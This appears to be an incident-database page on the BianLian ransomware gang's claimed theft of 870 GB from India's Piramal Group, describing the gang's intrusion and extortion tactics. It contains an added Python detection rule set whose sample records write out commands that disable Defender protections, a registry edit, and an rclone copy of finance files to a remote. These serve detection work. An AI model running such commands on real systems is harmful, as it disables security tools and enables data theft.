
Cyber Incident Victim: Piramal Group

Date:

Jun 2023

Location:

India

Summary

The BianLian ransomware gang claimed a cyber attack against the Indian conglomerate Piramal Group, alleging they had accessed 870 GB of sensitive data. The compromised information reportedly included financial and accounting records, project data, technical details, and personal information. The group employs an exfiltration-based extortion model, threatening to release stolen data unless a ransom is paid, and is known for using aggressive pressure tactics.

CIA Posture: Available to members

Motives: 1 motive

Tactics, Techniques & Procedures: 2 techniques

Threat Actor: 1 actor

Type: Available to members

Location: Available to members

Description

On June 28, 2023, the ThreatMon Threat Intelligence team reported an alleged cyber attack targeting the Piramal Group, an Indian business conglomerate with a global presence. The threat intelligence service Falcon Feeds subsequently confirmed the incident. The BianLian ransomware gang claimed responsibility for this attack by listing the Piramal Group as a victim on its data leak site. The group did not specify which of the conglomerate's numerous business divisions it had targeted in its post. The Piramal Group itself did not release an official statement regarding the incident at the time it was reported. The Corporate Communications and Investor Relations & Sustainability teams of the Piramal Group were contacted for an official confirmation but had not provided a reply by the time the initial report was published.


According to the claims made by the BianLian group on its leak site, the threat actors had successfully exfiltrated approximately 870 gigabytes of data from the Piramal Group's network. The allegedly stolen data was described as including sensitive financial information, accounting details pertaining to other companies, project data, technical specifications, and personal information. The BianLian ransomware gang is a prolific cybercrime group that has been active since at least 2019. The group is known for its exfiltration-based extortion model. Initially, BianLian employed a double-extortion tactic, which involved both encrypting victims' systems and stealing data. However, around January 2023, the group shifted its primary focus to solely exfiltrating data and threatening to release it publicly unless a ransom was paid.

The techniques used by the BianLian group to gain initial access to victim networks are varied and include phishing emails, the use of exploit kits, and Remote Desktop Protocol (RDP) brute-force attacks. Once access is obtained, the actors engage in a detailed process of network intrusion. They implant custom backdoors written in the Go programming language to maintain persistence within the compromised environment. The group also installs various types of remote management and access software to facilitate control over the systems. To further establish their foothold, they create new local administrator accounts or re-enable existing accounts that had been disabled.

A key part of the BianLian group's operational playbook involves actively working to evade detection by security tools. They use PowerShell and Windows Command Shell scripts to disable antivirus software running on the compromised machines. They also modify settings within the Windows Registry to weaken the system's defenses. The actors then perform extensive network and Active Directory enumeration to understand the layout of the environment and identify valuable targets. They harvest credentials from the compromised systems, which allows them to move laterally across the network with greater ease and access additional systems and data stores.

During the data theft stage, the BianLian group searches for sensitive files using tailored PowerShell scripts. Once identified, this data is exfiltrated from the network using common file transfer methods. The group has been observed using File Transfer Protocol (FTP), the command-line program Rclone, and the Mega file-sharing service to move the stolen data to external servers under their control. In attacks where they still deploy encryption, the group encrypts files with a distinct extension, '.bianlian', and leaves a ransom note in every affected directory. The group employs additional pressure tactics to compel victims to pay; these include printing the ransom note to printers connected to the compromised network and making threatening telephone calls directly to employees of the victim company.
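As an added, defender-side illustration that is not part of this incident page: a small Python rule set that flags, in constructed Windows event-style log records, the behaviours the preceding three paragraphs attribute to BianLian (antivirus disabled through PowerShell/cmd and registry edits, new or re-enabled local administrator accounts, Rclone/FTP/MEGA transfers, and files renamed with the '.bianlian' extension). The record field names, the particular Defender settings matched, and every sample record are assumptions made for this illustration; the page itself names none of them.

```python
"""Added illustration, not part of the incident write-up: a minimal rule set that
maps constructed log records onto the BianLian behaviours the page describes."""
import re

# --- Constructed sample records (assumed schema: event_id, process, command_line,
# --- user, group, path). Event IDs are the real Windows Security / Sysmon IDs:
# 4688 process creation, 4720 user created, 4722 user enabled,
# 4732 member added to local group, 11 Sysmon FileCreate.
SAMPLE_EVENTS = [
    {"event_id": 4688, "process": "powershell.exe",
     "command_line": "powershell -nop -c Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"event_id": 4688, "process": "reg.exe",
     "command_line": 'reg add "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender" '
                     "/v DisableAntiSpyware /t REG_DWORD /d 1 /f"},
    {"event_id": 4720, "user": "svc_backup2"},                         # new local account
    {"event_id": 4732, "user": "svc_backup2", "group": "Administrators"},  # made admin
    {"event_id": 4722, "user": "Guest"},                               # disabled account re-enabled
    {"event_id": 4688, "process": "rclone.exe",
     "command_line": "rclone copy D:\\Finance remote:share --transfers 8"},
    {"event_id": 11, "path": "D:\\Finance\\Q2\\ledger.xlsx.bianlian"},
    {"event_id": 11, "path": "D:\\Projects\\plan.docx.bianlian"},
    {"event_id": 4688, "process": "notepad.exe",                       # benign control record
     "command_line": "notepad.exe C:\\notes.txt"},
]

SHELLS = {"powershell.exe", "cmd.exe", "reg.exe"}
ADMIN_GROUPS = {"administrators"}
EXFIL_TOOLS = {"rclone.exe", "ftp.exe"}        # Rclone and FTP, both named on the page
# Assumed Defender settings an AV-disabling script would touch (real setting names,
# but the page does not say which ones BianLian changes).
DEFENSE_TAMPER = re.compile(
    r"DisableRealtimeMonitoring|DisableAntiSpyware|DisableBehaviorMonitoring", re.I)
ENCRYPTED_EXT = ".bianlian"                    # extension named on the page


def classify(event):
    """Return the list of technique labels a single record matches (empty if none)."""
    hits = []
    proc = event.get("process", "").lower()
    cmd = event.get("command_line", "")
    eid = event.get("event_id")
    path = event.get("path", "")

    # Defense evasion: shell or reg.exe switching AV features off / editing the registry
    if proc in SHELLS and DEFENSE_TAMPER.search(cmd):
        hits.append("defense_evasion")
    # Persistence: local account created or re-enabled, or added to Administrators
    if eid in (4720, 4722):
        hits.append("account_persistence")
    if eid == 4732 and event.get("group", "").lower() in ADMIN_GROUPS:
        hits.append("account_persistence")
    # Exfiltration: Rclone / FTP process, or a MEGA destination on the command line
    if proc in EXFIL_TOOLS or re.search(r"\bmega\b", cmd, re.I):
        hits.append("exfiltration")
    # Impact: a file written with the group's encryption extension
    if path.lower().endswith(ENCRYPTED_EXT):
        hits.append("encryption")
    return hits


def triage(events):
    """Group matching records by technique label: {label: [event, ...]}."""
    summary = {}
    for e in events:
        for label in classify(e):
            summary.setdefault(label, []).append(e)
    return summary


def stages_observed(events):
    """Sorted list of the intrusion stages seen, for a quick 'how far along' read."""
    return sorted(triage(events))


if __name__ == "__main__":
    for label, matched in triage(SAMPLE_EVENTS).items():
        print(f"{label}: {len(matched)} record(s)")
    print("stages:", stages_observed(SAMPLE_EVENTS))
```

Seeing the persistence, defense-evasion and exfiltration labels together in a short window is the signal worth alerting on; any one of them alone (an admin adding a service account, a backup job using Rclone) is routinely benign, which is why the rules are kept separate and only correlated by `stages_observed`.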

The ultimate threat posed by the BianLian group is the public release of the exfiltrated data on a leak site that they maintain on the Tor network. This is their primary lever for extortion, especially following their shift away from routine encryption. The Piramal Group incident was not an isolated event for the threat actor around this time. Other recent victims claimed by the BianLian ransomware gang included Mitcon Consultancy, St. Rose Hospital, and the Australian Real Estate Group (AREG). The significant volume of data allegedly stolen from Piramal, at 870 GB, indicated a major breach with potential consequences across its diverse business units, which include pharmaceuticals, financial services, real estate, and a large philanthropic foundation. The potential exposure of financial data, third-party accounting information, and personal details posed serious risks of financial fraud, reputational damage, and regulatory scrutiny. The full impact of the incident, including whether any data was published or a ransom was paid, was not publicly disclosed at the time of the initial reporting.

Sources
Sources available to members
1 source